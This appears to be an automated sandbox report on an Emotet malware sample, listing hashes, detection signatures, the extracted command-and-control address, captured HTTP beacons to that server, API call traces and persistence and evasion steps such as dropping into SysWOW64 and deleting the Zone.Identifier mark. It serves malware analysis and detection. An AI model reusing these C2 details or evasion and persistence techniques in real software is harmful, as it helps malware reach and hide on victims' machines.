
Analysis Report 7ZYwCQ5sAy

Overview

General Information

Sample Name: 7ZYwCQ5sAy (renamed file extension from none to exe)
MD5: a842af0d929ae1f564bf3c0fbfe80d86
SHA1: a61d1b63d47208729816dd3a5bb4704c261015b9
SHA256: 23452214dba9a7be2b4b9c04f4ce5ccab222519f0d985961539f1ec4547b84bc


Detection

Emotet
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Contains functionality locales information (e.g. system language)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to upload files via FTP
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • 7ZYwCQ5sAy.exe (PID: 3636 cmdline: 'C:\Users\user\Desktop\7ZYwCQ5sAy.exe' MD5: A842AF0D929AE1F564BF3C0FBFE80D86)
    • KBDURDU.exe (PID: 2448 cmdline: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe MD5: A842AF0D929AE1F564BF3C0FBFE80D86)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["190.63.7.166/m5tYf9STTRkjXz"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.1065940307.00000000022D0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000001.00000002.1471371090.0000000002190000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Found malware configuration
Source: KBDURDU.exe.2448.1.memstr | Malware Configuration Extractor: Emotet {"C2 list": ["190.63.7.166/m5tYf9STTRkjXz"]}
Multi AV Scanner detection for submitted file
Source: 7ZYwCQ5sAy.exe | Virustotal: Detection: 61%
Source: 7ZYwCQ5sAy.exe | ReversingLabs: Detection: 74%

Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_021A20D0 CryptDecodeObjectEx,1_2_021A20D0
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_021A20E8 CryptDecodeObjectEx,1_2_021A20E8

Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00448808 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_00448808
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00448ECB lstrlenA,FindFirstFileA,FindClose,0_2_00448ECB
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_004692FB __EH_prolog,lstrlenA,lstrcpynA,FtpFindFirstFileA,0_2_004692FB
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00409909 lstrcpyA,FindFirstFileA,GetLastError,SetLastError,lstrlenA,SetLastError,0_2_00409909
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00467F40 GopherFindFirstFileA,0_2_00467F40
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00467FDE GopherFindFirstFileA,0_2_00467FDE
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_022E3030 FindNextFileW,FindFirstFileW,FindClose,0_2_022E3030
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00448808 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,1_2_00448808
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00448ECB lstrlenA,FindFirstFileA,FindClose,1_2_00448ECB
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_004692FB __EH_prolog,lstrlenA,lstrcpynA,FtpFindFirstFileA,1_2_004692FB
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00409909 lstrcpyA,FindFirstFileA,GetLastError,SetLastError,lstrlenA,SetLastError,1_2_00409909
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00467F40 GopherFindFirstFileA,1_2_00467F40
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00467FDE GopherFindFirstFileA,1_2_00467FDE

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.6:49942 -> 190.63.7.166:8080
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_004678AF FtpPutFileA,0_2_004678AF
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_004678AF FtpPutFileA,1_2_004678AF
Source: global traffic | TCP traffic: 192.168.2.6:49942 -> 190.63.7.166:8080
Source: Joe Sandbox View | ASN Name: unknown unknown
Source: global traffic | HTTP traffic detected:
  POST /m5tYf9STTRkjXz/XPuDEs/SKGs/ HTTP/1.1
  Referer: http://190.63.7.166/m5tYf9STTRkjXz/XPuDEs/SKGs/
  Content-Type: multipart/form-data; boundary=---------------------------223834914667424
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 190.63.7.166:8080
  Content-Length: 4660
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 190.63.7.166 (6 occurrences)
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_004682AB InternetReadFile,InternetReadFile,InternetReadFile,InternetWriteFile,InternetWriteFile,InternetWriteFile,InternetWriteFile,lstrlenA,0_2_004682AB
Source: unknown | HTTP traffic detected:
  POST /m5tYf9STTRkjXz/XPuDEs/SKGs/ HTTP/1.1
  Referer: http://190.63.7.166/m5tYf9STTRkjXz/XPuDEs/SKGs/
  Content-Type: multipart/form-data; boundary=---------------------------223834914667424
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 190.63.7.166:8080
  Content-Length: 4660
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: KBDURDU.exe, 00000001.00000002.1469829093.0000000000199000.00000004.00000001.sdmp | String found in binary or memory: http://190.63.7.166/m5tYf9STTRkjXz/XPuDEs/SKGs/
Source: 7ZYwCQ5sAy.exe | String found in binary or memory: http://www.codeproject.com/internet/webgrab.asp
Source: 7ZYwCQ5sAy.exe, 00000000.00000002.1066064106.00000000023B0000.00000004.00000040.sdmp | String found in binary or memory: http://www.codeproject.com/internet/webgrab.aspYl

Source: 7ZYwCQ5sAy.exe, 00000000.00000002.1065628832.00000000006EA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_0043A48C __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,0_2_0043A48C
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_0045A8A0 ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,0_2_0045A8A0
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00464AB8 GetKeyState,GetKeyState,GetKeyState,0_2_00464AB8
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00445275 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_00445275
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00441904 GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_00441904
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00461DCE GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,0_2_00461DCE
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00464AB8 GetKeyState,GetKeyState,GetKeyState,1_2_00464AB8
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00445275 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_00445275
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00441904 GetKeyState,GetKeyState,GetKeyState,GetKeyState,1_2_00441904
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00461DCE GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,1_2_00461DCE
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_0043A48C __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,1_2_0043A48C
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_0045A8A0 ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,1_2_0045A8A0

E-Banking Fraud:

Yara detected Emotet
Source: Yara match | File source: 00000000.00000002.1065940307.00000000022D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1471371090.0000000002190000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | File created: C:\Windows\SysWOW64\KBDURDU\
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | File deleted: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe:Zone.Identifier
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00424377 0_2_00424377
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_004165E4 0_2_004165E4
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00412678 0_2_00412678
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_004468E9 0_2_004468E9
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_0041B3EC 0_2_0041B3EC
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_022D521F 0_2_022D521F
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_022E58E0 0_2_022E58E0
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00424377 1_2_00424377
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_004165E4 1_2_004165E4
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00412678 1_2_00412678
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_004468E9 1_2_004468E9
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_0041B3EC 1_2_0041B3EC
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_0219521F 1_2_0219521F
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_021A58E0 1_2_021A58E0
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: String function: 00417C7C appears 370 times
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: String function: 00444BFF appears 33 times
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: String function: 0041ACA1 appears 32 times
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: String function: 0046D901 appears 49 times
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: String function: 004011F9 appears 35 times
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: String function: 0041CCA7 appears 41 times
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: String function: 0043FF19 appears 43 times
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: String function: 004181E8 appears 80 times
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: String function: 00417C7C appears 370 times
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: String function: 00444BFF appears 33 times
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: String function: 0041ACA1 appears 32 times
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: String function: 0046D901 appears 49 times
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: String function: 0041CCA7 appears 41 times
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: String function: 0043FF19 appears 43 times
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: String function: 004181E8 appears 79 times
Source: 7ZYwCQ5sAy.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7ZYwCQ5sAy.exe, 00000000.00000002.1068092313.0000000002EA0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs 7ZYwCQ5sAy.exe
Source: 7ZYwCQ5sAy.exe, 00000000.00000002.1068092313.0000000002EA0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 7ZYwCQ5sAy.exe
Source: 7ZYwCQ5sAy.exe, 00000000.00000002.1065015833.00000000004B5000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameWebGrabber.EXEN vs 7ZYwCQ5sAy.exe
Source: 7ZYwCQ5sAy.exe, 00000000.00000002.1067804110.0000000002DA0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs 7ZYwCQ5sAy.exe
Source: 7ZYwCQ5sAy.exe, 00000000.00000002.1065902764.0000000002280000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs 7ZYwCQ5sAy.exe
Source: 7ZYwCQ5sAy.exe | Binary or memory string: OriginalFilenameWebGrabber.EXEN vs 7ZYwCQ5sAy.exe
Source: classification engine | Classification label: mal80.troj.evad.winEXE@3/0@0/1
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00467BEA LoadLibraryA,FormatMessageA,FormatMessageA,FormatMessageA,LocalFree,InternetGetLastResponseInfoA,InternetGetLastResponseInfoA,GetLastError,LocalAlloc,InternetGetLastResponseInfoA,lstrcpynA,LocalFree,lstrcpynA,LocalFree,FreeLibrary,0_2_00467BEA
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00452AF8 __EH_prolog,GetDiskFreeSpaceA,GetFullPathNameA,GetTempFileNameA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,0_2_00452AF8
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_021A4170 Process32NextW,CreateToolhelp32Snapshot,FindCloseChangeNotification,1_2_021A4170
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_0047CC20 CoCreateInstance,CoCreateInstance,CoCreateInstance,OleRun,0_2_0047CC20
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00406030 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceA,LoadResource,SizeofResource,VirtualAllocExNuma,0_2_00406030
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\I96565711
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\M96565711
Source: 7ZYwCQ5sAy.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 7ZYwCQ5sAy.exe | Virustotal: Detection: 61%
Source: 7ZYwCQ5sAy.exe | ReversingLabs: Detection: 74%
Source: unknown | Process created: C:\Users\user\Desktop\7ZYwCQ5sAy.exe 'C:\Users\user\Desktop\7ZYwCQ5sAy.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Process created: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00443D7D GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,0_2_00443D7D
Source: 7ZYwCQ5sAy.exe | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00418223 push ecx; ret 0_2_00418233
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_004166F0 push eax; ret 0_2_00416704
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_004166F0 push eax; ret 0_2_0041672C
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00417C7C push eax; ret 0_2_00417C9A
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_022D9472 push eax; retf 0_2_022D95A9
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_022D9441 push eax; ret 0_2_022D946D
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_022D94C6 push eax; retf 0_2_022D95A9
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_022D9556 push eax; retf 0_2_022D95A9
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00418223 push ecx; ret 1_2_00418233
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_004166F0 push eax; ret 1_2_00416704
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_004166F0 push eax; ret 1_2_0041672C
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00417C7C push eax; ret 1_2_00417C9A
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_02199441 push eax; ret 1_2_0219946D
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_02199472 push eax; retf 1_2_021995A9
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_021994C6 push eax; retf 1_2_021995A9
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_02199556 push eax; retf 1_2_021995A9

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Executable created and started: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | PE file moved: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | File opened: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_004084FA IsIconic,GetWindowPlacement,GetWindowRect,0_2_004084FA
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_0040141A IsIconic,0_2_0040141A
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_004013A7 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_004013A7
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_004576A9 __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,0_2_004576A9
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00461E71 IsWindowVisible,IsIconic,0_2_00461E71
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00451EF8 GetParent,GetParent,IsIconic,GetParent,0_2_00451EF8
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_004084FA IsIconic,GetWindowPlacement,GetWindowRect,1_2_004084FA
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_0040141A IsIconic,1_2_0040141A
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_004013A7 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,1_2_004013A7
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00461E71 IsWindowVisible,IsIconic,1_2_00461E71
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00451EF8 GetParent,GetParent,IsIconic,GetParent,1_2_00451EF8
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_004576A9 __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,1_2_004576A9
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Process information set: NOOPENFILEERRORBOX (5 occurrences)

Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | API coverage: 2.8 %
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | API coverage: 2.7 %
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00448808 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_00448808
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00448ECB lstrlenA,FindFirstFileA,FindClose,0_2_00448ECB
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_004692FB __EH_prolog,lstrlenA,lstrcpynA,FtpFindFirstFileA,0_2_004692FB
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00409909 lstrcpyA,FindFirstFileA,GetLastError,SetLastError,lstrlenA,SetLastError,0_2_00409909
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00467F40 GopherFindFirstFileA,0_2_00467F40
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00467FDE GopherFindFirstFileA,0_2_00467FDE
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_022E3030 FindNextFileW,FindFirstFileW,FindClose,0_2_022E3030
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00448808 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,1_2_00448808
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00448ECB lstrlenA,FindFirstFileA,FindClose,1_2_00448ECB
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_004692FB __EH_prolog,lstrlenA,lstrcpynA,FtpFindFirstFileA,1_2_004692FB
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00409909 lstrcpyA,FindFirstFileA,GetLastError,SetLastError,lstrlenA,SetLastError,1_2_00409909
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00467F40 GopherFindFirstFileA,1_2_00467F40
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_00467FDE GopherFindFirstFileA,1_2_00467FDE
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_0041640F VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_0041640F
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_00443D7D GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,0_2_00443D7D
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_022D0467 mov eax, dword ptr fs:[00000030h] 0_2_022D0467
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_022D2E6F mov eax, dword ptr fs:[00000030h] 0_2_022D2E6F
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_022D3BDF mov eax, dword ptr fs:[00000030h] 0_2_022D3BDF
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_022E42A0 mov eax, dword ptr fs:[00000030h] 0_2_022E42A0
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_022E3530 mov eax, dword ptr fs:[00000030h] 0_2_022E3530
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_02190467 mov eax, dword ptr fs:[00000030h] 1_2_02190467
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_02192E6F mov eax, dword ptr fs:[00000030h] 1_2_02192E6F
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_02193BDF mov eax, dword ptr fs:[00000030h] 1_2_02193BDF
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_021A42A0 mov eax, dword ptr fs:[00000030h] 1_2_021A42A0
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_021A3530 mov eax, dword ptr fs:[00000030h] 1_2_021A3530
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_0041EDE6 SetUnhandledExceptionFilter,0_2_0041EDE6
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: 0_2_0041EDFA SetUnhandledExceptionFilter,0_2_0041EDFA
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_0041EDE6 SetUnhandledExceptionFilter,1_2_0041EDE6
Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe | Code function: 1_2_0041EDFA SetUnhandledExceptionFilter,1_2_0041EDFA

Source: KBDURDU.exe, 00000001.00000002.1471201156.0000000000CF0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: KBDURDU.exe, 00000001.00000002.1471201156.0000000000CF0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: KBDURDU.exe, 00000001.00000002.1471201156.0000000000CF0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: KBDURDU.exe, 00000001.00000002.1471201156.0000000000CF0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: GetLocaleInfoA,_strncpy,0_2_00426DDE
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: _strlen,EnumSystemLocalesA,0_2_004272FD
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: _strlen,_strlen,EnumSystemLocalesA,0_2_00427334
Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exe | Code function: _strlen,EnumSystemLocalesA,0_2_004273BA
